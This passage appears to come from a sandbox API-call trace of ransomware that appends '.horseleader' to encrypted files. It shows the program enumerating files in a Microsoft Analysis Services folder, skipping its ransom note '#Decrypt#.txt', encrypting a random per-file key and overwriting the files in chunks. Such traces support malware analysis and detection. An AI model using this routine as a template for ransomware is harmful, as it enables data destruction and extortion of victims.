Size=0x840) returned 0x7e3120 [0252.089] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.horseleader") returned 96 [0252.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl.horseleader")) returned 1 [0252.091] GetProcessHeap () returned 0x780000 [0252.091] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.091] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x712e, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="msjet.xsl", cAlternateFileName="")) returned 1 [0252.091] lstrcmpiW (lpString1="msjet.xsl", lpString2="Windows") returned -1 [0252.091] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 81 [0252.091] StrStrIW (lpFirst="msjet.xsl", lpSrch=".horseleader") returned 0x0 [0252.091] lstrcmpW (lpString1="msjet.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.091] lstrcmpW (lpString1="msjet.xsl", lpString2="_uninstalling_.png") returned 1 [0252.091] lstrlenW (lpString=".testttjffg") returned 11 [0252.091] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl", lpSrch=".testttjffg") returned 0x0 [0252.091] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.091] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.092] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl") returned 81 [0252.092] StrStrW (lpFirst="msjet.xsl", lpSrch=".txt") returned 0x0 [0252.092] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=28974) returned 1 [0252.092] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.095] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.096] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.096] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x212e, lpOverlapped=0x0) returned 1 [0252.096] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffded2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.097] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x212e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x212e, lpOverlapped=0x0) returned 1 [0252.097] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.097] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.097] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.097] CloseHandle (hObject=0x1a4) returned 1 [0252.097] GetProcessHeap () returned 0x780000 [0252.098] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.098] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.horseleader") returned 93 [0252.098] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl.horseleader")) returned 1 [0252.099] GetProcessHeap () returned 0x780000 [0252.099] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.099] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x851c, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="sql2000.xsl", cAlternateFileName="")) returned 1 [0252.099] lstrcmpiW (lpString1="sql2000.xsl", lpString2="Windows") returned -1 [0252.099] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 83 [0252.099] StrStrIW (lpFirst="sql2000.xsl", lpSrch=".horseleader") returned 0x0 [0252.099] lstrcmpW (lpString1="sql2000.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.099] lstrcmpW (lpString1="sql2000.xsl", lpString2="_uninstalling_.png") returned 1 [0252.099] lstrlenW (lpString=".testttjffg") returned 11 [0252.099] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl", lpSrch=".testttjffg") returned 0x0 [0252.099] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.099] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.100] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.101] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl") returned 83 [0252.101] StrStrW (lpFirst="sql2000.xsl", lpSrch=".txt") returned 0x0 [0252.101] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=34076) returned 1 [0252.101] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.104] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.104] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.104] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x351c, lpOverlapped=0x0) returned 1 [0252.106] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffcae4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x351c, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x351c, lpOverlapped=0x0) returned 1 [0252.106] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.106] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.107] CloseHandle (hObject=0x1a4) returned 1 [0252.107] GetProcessHeap () returned 0x780000 [0252.107] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.107] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.horseleader") returned 95 [0252.107] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.horseleader")) returned 1 [0252.108] GetProcessHeap () returned 0x780000 [0252.108] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.108] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x7d92, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="sql70.xsl", cAlternateFileName="")) returned 1 [0252.108] lstrcmpiW (lpString1="sql70.xsl", lpString2="Windows") returned -1 [0252.108] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 81 [0252.108] StrStrIW (lpFirst="sql70.xsl", lpSrch=".horseleader") returned 0x0 [0252.108] lstrcmpW (lpString1="sql70.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.108] lstrcmpW (lpString1="sql70.xsl", lpString2="_uninstalling_.png") returned 1 [0252.108] lstrlenW (lpString=".testttjffg") returned 11 [0252.108] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl", lpSrch=".testttjffg") returned 0x0 [0252.108] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.109] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.109] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.110] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl") returned 81 [0252.110] StrStrW (lpFirst="sql70.xsl", lpSrch=".txt") returned 0x0 [0252.110] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=32146) returned 1 [0252.110] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.114] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.114] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.114] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2d92, lpOverlapped=0x0) returned 1 [0252.115] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd26e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.115] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2d92, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2d92, lpOverlapped=0x0) returned 1 [0252.115] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.115] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.115] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.115] CloseHandle (hObject=0x1a4) returned 1 [0252.116] GetProcessHeap () returned 0x780000 [0252.116] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.116] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.horseleader") returned 93 [0252.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl.horseleader")) returned 1 [0252.117] GetProcessHeap () returned 0x780000 [0252.117] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.117] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51552c10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x9a5b, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="sql90.xsl", cAlternateFileName="")) returned 1 [0252.117] lstrcmpiW (lpString1="sql90.xsl", lpString2="Windows") returned -1 [0252.117] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 81 [0252.117] StrStrIW (lpFirst="sql90.xsl", lpSrch=".horseleader") returned 0x0 [0252.117] lstrcmpW (lpString1="sql90.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.117] lstrcmpW (lpString1="sql90.xsl", lpString2="_uninstalling_.png") returned 1 [0252.117] lstrlenW (lpString=".testttjffg") returned 11 [0252.117] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl", lpSrch=".testttjffg") returned 0x0 [0252.117] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.117] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.117] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.118] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl") returned 81 [0252.118] StrStrW (lpFirst="sql90.xsl", lpSrch=".txt") returned 0x0 [0252.118] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=39515) returned 1 [0252.118] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.121] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.121] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.121] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4a5b, lpOverlapped=0x0) returned 1 [0252.122] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb5a5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.122] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4a5b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4a5b, lpOverlapped=0x0) returned 1 [0252.122] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.122] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0252.122] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0252.122] CloseHandle (hObject=0x1a4) returned 1 [0252.122] GetProcessHeap () returned 0x780000 [0252.122] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0252.122] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.horseleader") returned 93 [0252.123] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl.horseleader" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl.horseleader")) returned 1 [0252.123] GetProcessHeap () returned 0x780000 [0252.123] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0252.123] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa81fdc00, ftCreationTime.dwHighDateTime=0x1c8dd0e, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa81fdc00, ftLastWriteTime.dwHighDateTime=0x1c8dd0e, nFileSizeHigh=0x0, nFileSizeLow=0x745e, dwReserved0=0x780150, dwReserved1=0xfbc691b5, cFileName="Sybase.xsl", cAlternateFileName="")) returned 1 [0252.124] lstrcmpiW (lpString1="Sybase.xsl", lpString2="Windows") returned -1 [0252.124] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 82 [0252.124] StrStrIW (lpFirst="Sybase.xsl", lpSrch=".horseleader") returned 0x0 [0252.124] lstrcmpW (lpString1="Sybase.xsl", lpString2="#Decrypt#.txt") returned 1 [0252.124] lstrcmpW (lpString1="Sybase.xsl", lpString2="_uninstalling_.png") returned 1 [0252.124] lstrlenW (lpString=".testttjffg") returned 11 [0252.124] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl", lpSrch=".testttjffg") returned 0x0 [0252.124] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0252.124] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0252.124] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0252.126] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl") returned 82 [0252.126] StrStrW (lpFirst="Sybase.xsl", lpSrch=".txt") returned 0x0 [0252.126] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=29790) returned 1 [0252.126] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.129] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.129] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0252.129] ReadFile (in: 